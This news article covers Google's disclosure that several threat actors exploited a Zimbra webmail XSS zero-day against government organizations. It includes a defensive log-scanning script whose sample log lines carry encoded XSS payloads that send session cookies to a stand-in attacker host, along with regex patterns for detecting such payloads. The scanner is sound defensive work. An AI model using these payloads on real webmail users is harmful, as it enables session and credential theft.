Months after Zimbra shipped a working patch, Google has disclosed more details about the active exploitation of a Zimbra zero-day vulnerability. The company explained how several threat actors exploited the flaw in distinct malicious campaigns, both before and after the official fix was released.
Zimbra Zero-Day Flaw Exploited To Target Govt. Orgs – Says Google
In a recent post, Google elaborated on different malicious campaigns exploiting the Zimbra zero-day vulnerability patched earlier this year.
Specifically, in July, Zimbra fixed a severe zero-day flaw in Zimbra Collaboration Suite (ZCS) email servers that allowed cross-site scripting (XSS) attacks. At the time, Zimbra shared no details about active exploitation of the flaw, although Google researchers disclosed that they had detected exploitation attempts. Beyond that, few details about the attacks were public.
Google has now shared insights into the repeated exploitation of the vulnerability against different government organizations. As explained in its post, Google's Threat Analysis Group (TAG) discovered the XSS vulnerability about a month before the patch was released and observed three separate campaigns exploiting it before the stable patch shipped.
Following the first exploitation, which targeted a government organization in Greece, Zimbra published a hotfix to its public GitHub repository. That hotfix, however, appears to have brought the zero-day to the attention of other threat actors. Google subsequently detected two more campaigns exploiting the flaw against users in Moldova and Tunisia, which Google TAG attributed to the Winter Vivern (UNC4907) APT group.
A third campaign also caught Google's attention: a separate, unidentified threat actor exploited the zero-day against a Vietnamese government organization in a phishing campaign aimed at stealing webmail credentials.
Although Zimbra released the official patch for the zero-day after the Vietnam campaign, attackers continued hunting for unpatched systems. A fourth campaign, designed to steal Zimbra authentication tokens, then surfaced, targeting a government organization in Pakistan.
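The campaigns above all ride on a reflected XSS bug in the ZCS webmail interface, where the injected script runs in a logged-in user's browser and can hand the attacker the session cookie or authentication token. A practical check for defenders is to look for such payloads in the webmail server's access logs. The script below is an added example, not code from Google's post or from Zimbra; it does not target the actual vulnerable endpoint or parameter (which this article does not name), and instead matches common XSS payload markers in any query parameter, decoding percent-encoding repeatedly so that double-encoded payloads are not missed. The log lines are constructed for the example and the paths and hosts in them are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines in combined log format. The paths,
# parameters and the evil.example host are hypothetical, not real Zimbra traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jul/2023:09:14:02 +0000] "GET /zimbra/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Jul/2023:09:14:07 +0000] "GET /m/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2Fc%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Jul/2023:09:15:33 +0000] "GET /h/search?query=%253Cimg%2520src%253Dx%2520onerror%253Dfetch%28%2527https%3A%2F%2Fevil.example%2F%2527%252Bdocument.cookie%29%253E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.13 - - [12/Jul/2023:09:16:01 +0000] "GET /m/search?q=quarterly%20report HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.14 - - [12/Jul/2023:09:16:44 +0000] "GET /zimbra/?loginOp=logout&redirect=javascript%3Aalert%281%29 HTTP/1.1" 302 0 "-" "curl/8.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators that a parameter value is an XSS payload rather than user data.
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*script", re.I)),
    ("event_handler", re.compile(r"<\s*(img|svg|iframe|body|input|details)\b[^>]*\bon\w+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("cookie_access", re.compile(r"document\s*\.\s*cookie", re.I)),
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing (catches double-encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_indicators(target):
    """Return [(param_name, [indicator, ...]), ...] for parameters carrying payload markers."""
    query = urlsplit(target).query
    hits = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        labels = [label for label, pat in XSS_PATTERNS if pat.search(value)]
        if labels:
            hits.append((fully_decode(name), labels))
    return hits


def scan_log(text):
    """Return one alert dict per request line whose query string looks like an XSS attempt."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        hits = find_xss_indicators(m["target"])
        if not hits:
            continue
        alerts.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "path": urlsplit(m["target"]).path,
            "status": int(m["status"]),
            "params": [name for name, _ in hits],
            "indicators": sorted({label for _, labels in hits for label in labels}),
        })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A hit with `cookie_access` alongside a 200 response is the case to escalate first: the payload was reflected to a victim who may have been logged in, so the session token it referenced should be treated as exposed and revoked. Note the scan deliberately ignores the HTTP status, since a reflected XSS response is a normal 200.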
Users Must Always Keep Their Systems Up-to-date
Beyond naming the countries involved, Google has not shared precise details about the victims or the outcome of these attacks. With this disclosure, however, Google emphasized the importance of applying security updates promptly.
Google also highlighted that threat actors monitor public open-source repositories for incoming vulnerability fixes, using the commits to learn about a flaw and hunt for vulnerable systems before administrators have applied the patch.
Let us know your thoughts in the comments.